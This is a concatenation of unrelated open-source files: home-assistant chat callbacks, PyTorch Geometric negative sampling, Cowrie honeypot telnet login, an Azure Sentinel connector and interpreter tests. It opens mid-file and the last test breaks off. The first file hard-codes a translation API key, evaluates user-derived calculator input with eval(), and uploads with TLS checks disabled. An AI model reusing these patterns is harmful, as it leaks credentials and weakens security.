elif msg.endswith(u"秒"):
t = int(Util.cn2dig(msg[:-1]))
elif msg.endswith(u"分钟"):
t = int(Util.cn2dig(msg[:-2]))*60
elif msg.endswith(u"小时"):
t = int(Util.cn2dig(msg[:-2]))*60*60
else:
self._home.publish_msg(cmd, u"时间格式错误")
            return False, None
if t is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
DEBUG("thread wait for %d sec" % (t, ))
self._home.publish_msg(cmd, action + target + msg)
threading.current_thread().waitUtil(t)
if threading.current_thread().stopped():
return False
self._home.setResume(True)
count = 7
Sound.notice( Res.get_res_path("sound/com_bell"), True, count)
self._home.setResume(False)
return True
class translate_callback(Callback.Callback):
base_url = "http://fanyi.youdao.com/openapi.do"
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无翻译内容")
elif len(msg) > 200:
self._home.publish_msg(cmd, u"翻译内容过长(<200字)")
else:
try:
values = {
"keyfrom":"11111testt111",
"key":"2125866912",
"type":"data",
"doctype":"json",
"version":"1.1",
"q":msg.encode("utf-8")
}
url = translate_callback.base_url + "?" + urllib.urlencode(values)
res = urllib2.urlopen(url).read()
res = " ".join(json.loads(res)["translation"])
self._home.publish_msg(cmd, u"翻译结果:\n" + res)
except Exception, ex:
ERROR("request error:", ex)
self._home.publish_msg(cmd, u"翻译失败")
return True
return True
class baidu_wiki_callback(Callback.Callback):
base_url = "http://wapbaike.baidu.com"
def searchWiki(self, word, time=10):
value = {"word": word.encode("utf-8")}
url = baidu_wiki_callback.base_url + \
"/search?" + urllib.urlencode(value)
try:
response = urllib2.urlopen(url, timeout=time)
html = response.read().encode("utf-8")
response.close()
real_url = None
content = None
m = re.compile(r"URL=(.+)'>").search(html)
if m:
real_url = m.group(1)
else:
return None, None
real_url = real_url[:real_url.index("?")]
if not real_url is None:
url = baidu_wiki_callback.base_url + real_url
response = urllib2.urlopen(url, timeout=time)
html = response.read()
response.close()
m = re.compile(
r'<p class="summary"><p>(.+)<div class="card-info">',
re.DOTALL
).search(html)
if m:
content = m.group(1)
return Util.strip_tags(content), url
else:
return None, None
except Exception, ex:
ERROR("wiki error: ", ex)
return None, None
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if not msg is None:
self._home.publish_msg(cmd, u"正在搜索...")
res, url = self.searchWiki(msg)
if res is None:
self._home.publish_msg(cmd, u"无百科内容")
else:
res = res.decode("utf-8")
if len(res) > 140:
res = res[:140]
msg = u"百度百科:\n %s...\n%s" \
% (res, url)
self._home.publish_msg(cmd, msg)
else:
self._home.publish_msg(cmd, u"无百科内容")
return True
class cal_callback(Callback.Callback):
_ops = {
u'加':'+',
u'减':'-',
u'乘':'*',
u'除':'/',
u'+':'+',
u'-':'-',
u'*':'*',
u'/':'/',
u'(':'(',
u'(':'(',
u')':')',
u')':')',
}
def _parse_tokens(self, src):
tokens = []
cur_t = u''
for term in src:
if term in cal_callback._ops:
if cur_t != u'':
tokens.append(cur_t)
cur_t = u''
tokens.append(term)
else:
cur_t += term
if cur_t != u'':
tokens.append(cur_t)
return tokens
def _parse_expression(self, tokens):
expression = u''
for token in tokens:
if token in cal_callback._ops:
expression += cal_callback._ops[token]
else:
num = Util.cn2dig(token)
if num is None:
return None
expression += str(num)
res = None
INFO("expression: " + expression)
try:
res = eval(expression)
res = Decimal.from_float(res).quantize(Decimal('0.00'))
except Exception, ex:
ERROR("cal expression error:", ex)
return res
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入公式, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无公式内容")
else:
tokens = self._parse_tokens(msg)
if not tokens is None:
res = self._parse_expression(tokens)
if not res is None:
self._home.publish_msg(cmd, u"%s = %s" % (msg, str(res)))
return True, res
else:
self._home.publish_msg(cmd, u"计算出错")
return True, None
else:
self._home.publish_msg(cmd, u"格式有误")
return True, None
class camera_quickshot_callback(Callback.Callback):
IMAGE_SERVER_URL = "http://lehome.sinaapp.com/image"
IMAGE_HOST_URL = "http://lehome-image.stor.sinaapp.com/"
def _upload_image(self, img_src, thumbnail_src):
if img_src is None or len(img_src) == 0:
return None, None
INFO("uploading: %s %s" % (img_src, thumbnail_src))
# swift --insecure upload image data/capture/2015_05_23_001856.jpg
proc = subprocess.Popen(
[
"swift",
"--insecure",
"upload",
"image",
thumbnail_src,
img_src
],
stdout=subprocess.PIPE
)
read_img = None
read_thumbnail = None
for i in range(2) :
try:
data = proc.stdout.readline().strip() #block / wait
INFO("swift readline: %s" % data)
if data.endswith(".thumbnail.jpg"):
INFO("save to storage:%s" % data)
read_thumbnail = camera_quickshot_callback.IMAGE_HOST_URL + data
elif data.endswith(".jpg"):
INFO("save to storage:%s" % data)
read_img = camera_quickshot_callback.IMAGE_HOST_URL + data
if not read_img is None and not read_thumbnail is None:
return read_img, read_thumbnail
except (KeyboardInterrupt, SystemExit):
raise
except Exception, ex:
ERROR(ex)
break
return None, None
def callback(self, cmd, msg):
self._home.publish_msg(cmd, u"正在截图...")
Sound.notice(Res.get_res_path("sound/com_shoot"))
save_path="data/capture/"
save_name, thumbnail_name = CameraHelper().take_a_photo(save_path)
# for test
# save_name = "2015_05_02_164052.jpg"
if save_name is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("capture faild.")
return True
img_url, thumbnail_url = self._upload_image(
save_path + save_name,
save_path + thumbnail_name,
)
if img_url is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("upload capture faild.")
return True
else:
self._home.publish_msg(
cmd,
msg=img_url,
cmd_type="capture"
)
return True
class push_info_callback(Callback.Callback):
def callback(self, cmd, target, msg):
if target is None or len(target) == 0:
if msg is None or len(msg) == 0:
self._home.publish_msg(cmd, u"请输入内容")
return True, None
self._home.publish_msg(cmd, msg)
DEBUG("show_callback: %s" % msg)
return True, msg
return True, "push"
|
torch_geometric/utils/negative_sampling.py | NucciTheBoss/pytorch_geometric | 2,350 | 9212 | import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
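# Usage sketch (illustrative only; the tensors below are hypothetical):
#
#   edge_index = torch.tensor([[0, 1, 2], [1, 2, 0]])
#   neg_edge_index = negative_sampling(edge_index, num_nodes=4)
#
# `neg_edge_index` then holds (approximately) edge_index.size(1) edges that do
# not appear in `edge_index`; self-loops are excluded for non-bipartite graphs.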
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
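# Usage sketch (illustrative only; the tensors below are hypothetical):
#
#   # Two graphs with 3 nodes each, batched together:
#   edge_index = torch.tensor([[0, 1, 3, 4], [1, 2, 4, 5]])
#   batch = torch.tensor([0, 0, 0, 1, 1, 1])
#   neg_edge_index = batched_negative_sampling(edge_index, batch)
#
# Negative edges are sampled per graph, so no returned edge crosses the
# boundary between the two examples.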
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True):
r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
rand = torch.randint(num_nodes, (row.size(0), ), dtype=torch.long)
neg_idx = row * num_nodes + rand
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = mask.nonzero(as_tuple=False).view(-1)
while rest.numel() > 0: # pragma: no cover
tmp = torch.randint(num_nodes, (rest.size(0), ), dtype=torch.long)
rand[rest] = tmp
neg_idx = row[rest] * num_nodes + tmp
mask = torch.from_numpy(np.isin(neg_idx, pos_idx)).to(torch.bool)
rest = rest[mask]
return edge_index[0], edge_index[1], rand.to(edge_index.device)
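# Usage sketch (illustrative only):
#
#   i, j, k = structured_negative_sampling(edge_index)
#
# For every positive edge (i, j) in `edge_index`, (i, k) is a sampled edge that
# is not in the graph (and not a self-loop when contains_neg_self_loops=False).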
def structured_negative_sampling_feasible(
edge_index: Tensor, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True) -> bool:
r"""Returns :obj:`True` if
:meth:`~torch_geometric.utils.structured_negative_sampling` is feasible
on the graph given by :obj:`edge_index`.
:obj:`~torch_geometric.utils.structured_negative_sampling` is infeasible
    if at least one node is connected to all other nodes.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: bool
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
max_num_neighbors = num_nodes
edge_index = coalesce(edge_index, num_nodes=num_nodes)
if not contains_neg_self_loops:
edge_index, _ = remove_self_loops(edge_index)
max_num_neighbors -= 1 # Reduce number of valid neighbors
deg = degree(edge_index[0], num_nodes)
# True if there exists no node that is connected to all other nodes.
return bool(torch.all(deg < max_num_neighbors))
###############################################################################
def sample(population: int, k: int, device=None) -> Tensor:
if population <= k:
return torch.arange(population, device=device)
else:
return torch.tensor(random.sample(range(population), k), device=device)
def edge_index_to_vector(
edge_index: Tensor,
size: Tuple[int, int],
bipartite: bool,
force_undirected: bool = False,
) -> Tuple[Tensor, int]:
row, col = edge_index
if bipartite: # No need to account for self-loops.
idx = (row * size[1]).add_(col)
population = size[0] * size[1]
return idx, population
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
# We only operate on the upper triangular matrix:
mask = row < col
row, col = row[mask], col[mask]
offset = torch.arange(1, num_nodes, device=row.device).cumsum(0)[row]
idx = row.mul_(num_nodes).add_(col).sub_(offset)
population = (num_nodes * (num_nodes + 1)) // 2 - num_nodes
return idx, population
else:
assert size[0] == size[1]
num_nodes = size[0]
# We remove self-loops as we do not want to take them into account
# when sampling negative values.
mask = row != col
row, col = row[mask], col[mask]
col[row < col] -= 1
idx = row.mul_(num_nodes - 1).add_(col)
population = num_nodes * num_nodes - num_nodes
return idx, population
def vector_to_edge_index(idx: Tensor, size: Tuple[int, int], bipartite: bool,
force_undirected: bool = False) -> Tensor:
if bipartite: # No need to account for self-loops.
row = idx.div(size[1], rounding_mode='floor')
col = idx % size[1]
return torch.stack([row, col], dim=0)
elif force_undirected:
assert size[0] == size[1]
num_nodes = size[0]
offset = torch.arange(1, num_nodes, device=idx.device).cumsum(0)
end = torch.arange(num_nodes, num_nodes * num_nodes, num_nodes,
device=idx.device)
row = torch.bucketize(idx, end.sub_(offset), right=True)
col = offset[row].add_(idx) % num_nodes
return torch.stack([torch.cat([row, col]), torch.cat([col, row])], 0)
else:
assert size[0] == size[1]
num_nodes = size[0]
row = idx.div(num_nodes - 1, rounding_mode='floor')
col = idx % (num_nodes - 1)
col[row <= col] += 1
return torch.stack([row, col], dim=0)
|
src/cowrie/telnet/userauth.py | uwacyber/cowrie | 2,316 | 9214 | <gh_stars>1000+
# Copyright (C) 2015, 2016 GoSecure Inc.
"""
Telnet Transport and Authentication for the Honeypot
@author: <NAME> <<EMAIL>>
"""
from __future__ import annotations
import struct
from twisted.conch.telnet import (
ECHO,
LINEMODE,
NAWS,
SGA,
AuthenticatingTelnetProtocol,
ITelnetProtocol,
)
from twisted.python import log
from cowrie.core.config import CowrieConfig
from cowrie.core.credentials import UsernamePasswordIP
class HoneyPotTelnetAuthProtocol(AuthenticatingTelnetProtocol):
"""
TelnetAuthProtocol that takes care of Authentication. Once authenticated this
protocol is replaced with HoneyPotTelnetSession.
"""
loginPrompt = b"login: "
passwordPrompt = b"Password: "
windowSize = [40, 80]
def connectionMade(self):
# self.transport.negotiationMap[NAWS] = self.telnet_NAWS
        # Initial option negotiation. Want something at least for Mirai
# for opt in (NAWS,):
# self.transport.doChain(opt).addErrback(log.err)
# I need to doubly escape here since my underlying
# CowrieTelnetTransport hack would remove it and leave just \n
self.transport.write(self.factory.banner.replace(b"\n", b"\r\r\n"))
self.transport.write(self.loginPrompt)
def connectionLost(self, reason):
"""
Fires on pre-authentication disconnects
"""
AuthenticatingTelnetProtocol.connectionLost(self, reason)
def telnet_User(self, line):
"""
Overridden to conditionally kill 'WILL ECHO' which confuses clients
that don't implement a proper Telnet protocol (most malware)
"""
self.username = line # .decode()
# only send ECHO option if we are chatting with a real Telnet client
self.transport.willChain(ECHO)
# FIXME: this should be configurable or provided via filesystem
self.transport.write(self.passwordPrompt)
return "Password"
def telnet_Password(self, line):
username, password = self.username, line # .decode()
del self.username
def login(ignored):
self.src_ip = self.transport.getPeer().host
creds = UsernamePasswordIP(username, password, self.src_ip)
d = self.portal.login(creds, self.src_ip, ITelnetProtocol)
d.addCallback(self._cbLogin)
d.addErrback(self._ebLogin)
# are we dealing with a real Telnet client?
if self.transport.options:
# stop ECHO
# even if ECHO negotiation fails we still want to attempt a login
# this allows us to support dumb clients which is common in malware
# thus the addBoth: on success and on exception (AlreadyNegotiating)
self.transport.wontChain(ECHO).addBoth(login)
else:
# process login
login("")
return "Discard"
def telnet_Command(self, command):
self.transport.protocol.dataReceived(command + b"\r")
return "Command"
def _cbLogin(self, ial):
"""
Fired on a successful login
"""
interface, protocol, logout = ial
protocol.windowSize = self.windowSize
self.protocol = protocol
self.logout = logout
self.state = "Command"
self.transport.write(b"\n")
# Remove the short timeout of the login prompt.
self.transport.setTimeout(
CowrieConfig.getint("honeypot", "interactive_timeout", fallback=300)
)
# replace myself with avatar protocol
protocol.makeConnection(self.transport)
self.transport.protocol = protocol
def _ebLogin(self, failure):
# TODO: provide a way to have user configurable strings for wrong password
self.transport.wontChain(ECHO)
self.transport.write(b"\nLogin incorrect\n")
self.transport.write(self.loginPrompt)
self.state = "User"
def telnet_NAWS(self, data):
"""
From TelnetBootstrapProtocol in twisted/conch/telnet.py
"""
if len(data) == 4:
width, height = struct.unpack("!HH", b"".join(data))
self.windowSize = [height, width]
else:
log.msg("Wrong number of NAWS bytes")
def enableLocal(self, opt):
if opt == ECHO:
return True
# TODO: check if twisted now supports SGA (see git commit c58056b0)
elif opt == SGA:
return False
else:
return False
def enableRemote(self, opt):
# TODO: check if twisted now supports LINEMODE (see git commit c58056b0)
if opt == LINEMODE:
return False
elif opt == NAWS:
return True
elif opt == SGA:
return True
else:
return False
|
authcheck/app/model/exception.py | flyr4nk/secscan-authcheck | 572 | 9215 | class WebException(Exception):
pass
class ParserException(Exception):
"""
    Parsing exception
"""
pass
class ApiException(Exception):
"""
    API exception
"""
pass
class WsException(Exception):
"""
    Polling exception
"""
pass
class SsoException(Exception):
"""
    SSO exception
"""
pass
class LibException(Exception):
"""
    Lib exception
"""
pass
class AccountException(Exception):
"""
    Account exception (account no longer valid)
"""
pass
class FlowException(Exception):
"""
    Authentication traffic exception
"""
pass
|
Solutions/TenableIO/Data Connectors/azure_sentinel.py | johnbilliris/Azure-Sentinel | 2,227 | 9218 | <reponame>johnbilliris/Azure-Sentinel
import re
import base64
import hmac
import hashlib
import logging
import requests
from datetime import datetime
class AzureSentinel:
def __init__(self, workspace_id, workspace_key, log_type, log_analytics_url=''):
self._workspace_id = workspace_id
self._workspace_key = workspace_key
self._log_type = log_type
if ((log_analytics_url in (None, '') or str(log_analytics_url).isspace())):
log_analytics_url = 'https://' + self._workspace_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
if not re.match(pattern, str(log_analytics_url)):
raise Exception("Invalid Log Analytics Uri.")
self._log_analytics_url = log_analytics_url
def build_signature(self, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + \
str(content_length) + "\n" + content_type + \
"\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(self._workspace_key)
encoded_hash = base64.b64encode(hmac.new(
decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(
self._workspace_id, encoded_hash)
return authorization
def post_data(self, body):
logging.info('constructing post to send to Azure Sentinel.')
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
logging.info('build signature.')
signature = self.build_signature(
rfc1123date, content_length, method, content_type, resource)
logging.info('signature built.')
uri = self._log_analytics_url + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self._log_type,
'x-ms-date': rfc1123date
}
logging.info('sending post to Azure Sentinel.')
response = requests.post(uri, data=body, headers=headers)
logging.info(response.status_code)
if (response.status_code >= 200 and response.status_code <= 299):
return response.status_code
else:
            logging.warning("Events are not processed into Azure. Response code: {}".format(
response.status_code))
raise Exception(
f'Sending to Azure Sentinel failed with status code {response.status_code}')
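# Usage sketch (illustrative only; the workspace id, key, log type and payload
# below are hypothetical):
#
#   sentinel = AzureSentinel("my-workspace-id", "<base64-shared-key>", "TenableIO_CL")
#   sentinel.post_data('[{"asset_id": 1, "severity": "high"}]')
#
# post_data signs the request via build_signature (HMAC-SHA256 over the
# canonical method/length/type/date/resource string) and POSTs it to the
# workspace's Data Collector API endpoint.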
|
tests/transformation/streamline/test_move_identical_op_past_join_op.py | mmrahorovic/finn | 109 | 9223 | import pytest
from onnx import TensorProto
from onnx import helper as oh
import finn.core.onnx_exec as oxe
from finn.core.modelwrapper import ModelWrapper
from finn.transformation.streamline.reorder import MoveTransposePastJoinAdd
from finn.util.basic import gen_finn_dt_tensor
def create_model(perm):
if perm == [0, 3, 1, 2]:
in_shape = [1, 128, 1, 256]
out_shape = [1, 256, 128, 1]
if perm == [0, 2, 3, 1]:
in_shape = [1, 256, 128, 1]
out_shape = [1, 128, 1, 256]
Transpose1_node = oh.make_node(
"Transpose", inputs=["in_transpose1"], outputs=["out_transpose1"], perm=perm
)
Transpose2_node = oh.make_node(
"Transpose", inputs=["in_transpose2"], outputs=["out_transpose2"], perm=perm
)
Join1_node = oh.make_node(
"Add", inputs=["out_transpose1", "out_transpose2"], outputs=["out_join1"]
)
in_transpose1 = oh.make_tensor_value_info(
"in_transpose1", TensorProto.FLOAT, in_shape
)
in_transpose2 = oh.make_tensor_value_info(
"in_transpose2", TensorProto.FLOAT, in_shape
)
out_transpose1 = oh.make_tensor_value_info(
"out_transpose1", TensorProto.FLOAT, out_shape
)
out_transpose2 = oh.make_tensor_value_info(
"out_transpose2", TensorProto.FLOAT, out_shape
)
out_join1 = oh.make_tensor_value_info("out_join1", TensorProto.FLOAT, out_shape)
graph = oh.make_graph(
nodes=[Transpose1_node, Transpose2_node, Join1_node],
name="test_graph",
inputs=[in_transpose1, in_transpose2],
outputs=[out_join1],
value_info=[
out_transpose1,
out_transpose2,
],
)
onnx_model = oh.make_model(graph, producer_name="test_model")
model = ModelWrapper(onnx_model)
return model
# Permutation of transpose node
@pytest.mark.parametrize("perm", [[0, 3, 1, 2], [0, 2, 3, 1]])
def test_move_identical_op_past_join_op(perm):
model = create_model(perm)
# Create input data
input0_tensor_name = model.graph.input[0].name
input1_tensor_name = model.graph.input[1].name
# Note: it is assumed that both tensors have the same shape and data type
input_shape = model.get_tensor_shape(input0_tensor_name)
input_dtype = model.get_tensor_datatype(input0_tensor_name)
input_val = gen_finn_dt_tensor(input_dtype, input_shape)
input_dict = {}
input_dict[input0_tensor_name] = input_val
input_dict[input1_tensor_name] = input_val
model_transformed = model.transform(MoveTransposePastJoinAdd())
assert oxe.compare_execution(model, model_transformed, input_dict)
# Check if order changed
node0_input0_model = model.find_consumers(model.graph.input[0].name)[0].op_type
node1_input1_model = model.find_consumers(model.graph.input[1].name)[0].op_type
node0_input0_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[0].name
)[0].op_type
node1_input1_model_transformed = model_transformed.find_consumers(
model_transformed.graph.input[1].name
)[0].op_type
assert node0_input0_model != node0_input0_model_transformed
assert node1_input1_model != node1_input1_model_transformed
|
part19/test_interpreter.py | fazillatheef/lsbasi | 1,682 | 9241 | import unittest
class LexerTestCase(unittest.TestCase):
def makeLexer(self, text):
from spi import Lexer
lexer = Lexer(text)
return lexer
def test_tokens(self):
from spi import TokenType
records = (
('234', TokenType.INTEGER_CONST, 234),
('3.14', TokenType.REAL_CONST, 3.14),
('*', TokenType.MUL, '*'),
('DIV', TokenType.INTEGER_DIV, 'DIV'),
('/', TokenType.FLOAT_DIV, '/'),
('+', TokenType.PLUS, '+'),
('-', TokenType.MINUS, '-'),
('(', TokenType.LPAREN, '('),
(')', TokenType.RPAREN, ')'),
(':=', TokenType.ASSIGN, ':='),
('.', TokenType.DOT, '.'),
('number', TokenType.ID, 'number'),
(';', TokenType.SEMI, ';'),
('BEGIN', TokenType.BEGIN, 'BEGIN'),
('END', TokenType.END, 'END'),
('PROCEDURE', TokenType.PROCEDURE, 'PROCEDURE'),
)
for text, tok_type, tok_val in records:
lexer = self.makeLexer(text)
token = lexer.get_next_token()
self.assertEqual(token.type, tok_type)
self.assertEqual(token.value, tok_val)
def test_lexer_exception(self):
from spi import LexerError
lexer = self.makeLexer('<')
with self.assertRaises(LexerError):
lexer.get_next_token()
class ParserTestCase(unittest.TestCase):
def makeParser(self, text):
from spi import Lexer, Parser
lexer = Lexer(text)
parser = Parser(lexer)
return parser
def test_expression_invalid_syntax_01(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 10 * ; {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, ';')
self.assertEqual(the_exception.token.lineno, 6)
def test_expression_invalid_syntax_02(self):
from spi import ParserError, ErrorCode
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
a := 1 (1 + 2); {Invalid syntax}
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, '(')
self.assertEqual(the_exception.token.lineno, 6)
def test_maximum_one_VAR_block_is_allowed(self):
from spi import ParserError, ErrorCode
# zero VARs
parser = self.makeParser(
"""
PROGRAM Test;
BEGIN
END.
"""
)
parser.parse()
# one VAR
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
BEGIN
END.
"""
)
parser.parse()
parser = self.makeParser(
"""
PROGRAM Test;
VAR
a : INTEGER;
VAR
b : INTEGER;
BEGIN
a := 5;
b := a + 10;
END.
"""
)
with self.assertRaises(ParserError) as cm:
parser.parse()
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.UNEXPECTED_TOKEN)
self.assertEqual(the_exception.token.value, 'VAR')
self.assertEqual(the_exception.token.lineno, 5) # second VAR
class SemanticAnalyzerTestCase(unittest.TestCase):
def runSemanticAnalyzer(self, text):
from spi import Lexer, Parser, SemanticAnalyzer
lexer = Lexer(text)
parser = Parser(lexer)
tree = parser.parse()
semantic_analyzer = SemanticAnalyzer()
semantic_analyzer.visit(tree)
return semantic_analyzer
def test_semantic_duplicate_id_error(self):
from spi import SemanticError, ErrorCode
with self.assertRaises(SemanticError) as cm:
self.runSemanticAnalyzer(
"""
PROGRAM Test;
VAR
a : INTEGER;
a : REAL; {Duplicate identifier}
BEGIN
a := 5;
END.
"""
)
the_exception = cm.exception
self.assertEqual(the_exception.error_code, ErrorCode.DUPLICATE_ID)
self.assertEqual(the_exception.token.value, 'a')
self.assertEqual(the_exception.token.lineno, 5)
def test_semantic_id_not_found_error(self):
